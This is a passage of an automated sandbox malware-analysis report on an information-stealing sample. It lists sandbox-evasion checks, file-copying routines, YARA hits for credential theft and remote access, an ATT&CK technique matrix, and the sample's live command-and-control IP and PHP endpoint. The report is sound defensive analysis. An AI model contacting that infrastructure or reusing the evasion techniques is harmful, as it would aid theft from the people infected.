                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26449
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeEvaded block: after key decisiongraph_0-27610
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI coverage: 6.4 %
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_023EE697
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_023F3B17
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023F4B77
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_023EEF87
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_023F47D7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023EE077
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EF8F1 FindFirstFileA,0_2_023EF8F1
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_023EDCE7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_023EC0D7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023E1937
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023EF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_023EF917
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_023F4107
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                    Source: Amcache.hve.4.drBinary or memory string: VMware
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual USB Mouse
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin
                    Source: Amcache.hve.4.drBinary or memory string: VMware, Inc.
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1hbin@
                    Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                    Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000817000.00000004.00000020.00020000.00000000.sdmp, 4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                    Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000817000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW"
                    Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: vmci.sys
                    Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                    Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
                    Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
                    Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                    Source: Amcache.hve.4.drBinary or memory string: VMware20,1
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
                    Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                    Source: 4M3JIACIWk.exe, 00000000.00000002.2280849648.000000000078E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                    Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                    Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                    Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                    Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
                    Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
                    Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                    Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26434
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-27871
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26437
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26456
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26448
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26276
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26477
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeAPI call chain: ExitProcess graph end nodegraph_0-26322
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0079E9E3 push dword ptr fs:[00000030h]0_2_0079E9E3
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E092B mov eax, dword ptr fs:[00000030h]0_2_023E092B
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F99B7 mov eax, dword ptr fs:[00000030h]0_2_023F99B7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023E0D90 mov eax, dword ptr fs:[00000030h]0_2_023E0D90
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023FAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_023FAFAF
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023FD151 SetUnhandledExceptionFilter,0_2_023FD151
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023FB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_023FB5A1
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeMemory protected: page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: Process Memory Space: 4M3JIACIWk.exe PID: 4996, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_023F9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_023F9867
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00417B90
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_023F7DF7
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00416920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_00416920
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                    Source: C:\Users\user\Desktop\4M3JIACIWk.exeCode function: 0_2_00417A30 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,0_2_00417A30
                    Source: Amcache.hve.4.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                    Source: Amcache.hve.4.drBinary or memory string: MsMpEng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.23e0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.4M3JIACIWk.exe.2480000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.23e0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.4M3JIACIWk.exe.2480000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2087612753.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4M3JIACIWk.exe PID: 4996, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.23e0e67.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.4M3JIACIWk.exe.2480000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.23e0e67.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.4M3JIACIWk.exe.400000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.4M3JIACIWk.exe.2480000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2280583655.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2281115890.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.2087612753.0000000002480000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 4M3JIACIWk.exe PID: 4996, type: MEMORYSTR
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Native API
                    1
                    DLL Side-Loading
                    11
                    Process Injection
                    1
                    Masquerading
                    OS Credential Dumping2
                    System Time Discovery
                    Remote ServicesData from Local System1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Virtualization/Sandbox Evasion
                    LSASS Memory31
                    Security Software Discovery
                    Remote Desktop ProtocolData from Removable Media2
                    Ingress Tool Transfer
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                    Disable or Modify Tools
                    Security Account Manager1
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                    Process Injection
                    NTDS11
                    Process Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Account Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    System Owner/User Discovery
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading
                    Proc Filesystem123
                    System Information Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    4M3JIACIWk.exe39%ReversingLabs
                    4M3JIACIWk.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://upx.sf.net0%URL Reputationsafe
                    No contacted domains info
                    NameMaliciousAntivirus DetectionReputation
                    http://185.201.252.118/true
                      unknown
                      http://185.201.252.118/ef952bc0f542da4b.phptrue
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://upx.sf.netAmcache.hve.4.drfalse
                        • URL Reputation: safe
                        unknown
                        http://185.201.252.118/ws4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                          unknown
                          http://185.201.252.118/ef952bc0f542da4b.phpW4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                            unknown
                            http://185.201.252.1184M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, 4M3JIACIWk.exe, 00000000.00000002.2280849648.000000000078E000.00000004.00000020.00020000.00000000.sdmptrue
                              unknown
                              http://185.201.252.118/44M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                unknown
                                http://185.201.252.118/ef952bc0f542da4b.phpWindows4M3JIACIWk.exe, 00000000.00000002.2280928896.00000000007C8000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  http://185.201.252.118/ef952bc0f542da4b.php34M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                    unknown
                                    http://185.201.252.118/Y4M3JIACIWk.exe, 00000000.00000002.2280928896.0000000000801000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
